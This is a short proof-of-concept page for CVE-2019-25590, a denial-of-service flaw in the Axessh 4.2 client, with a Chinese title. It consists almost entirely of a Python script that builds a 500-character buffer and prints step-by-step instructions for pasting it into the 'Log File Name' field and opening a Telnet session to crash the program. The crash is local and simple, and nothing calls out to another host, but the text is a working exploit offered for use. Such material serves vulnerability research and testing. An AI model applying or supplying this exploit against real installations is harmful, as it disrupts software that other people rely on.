CVE-2019-25590 Axessh拒绝服务漏洞

# PoC for CVE-2019-25590 # This script generates the payload to crash Axessh 4.2 import sys def generate_poc(): # The vulnerability is triggered by a buffer of 500 or more characters # in the log file name field. buffer_size = 500 payload = "A" * buffer_size return payload if __name__ == "__main__": print("[+] Generating PoC payload for CVE-2019-25590...") payload = generate_poc() print(f"[+] Payload length: {len(payload)}") print("[+] Payload content (first 100 chars):", payload[:100]) print("\n[+] Instructions:") print("1. Open Axessh 4.2") print("2. Go to logging configuration and enable session logging") print("3. Paste the generated payload into the 'Log File Name' field") print("4. Establish a Telnet connection to trigger the crash")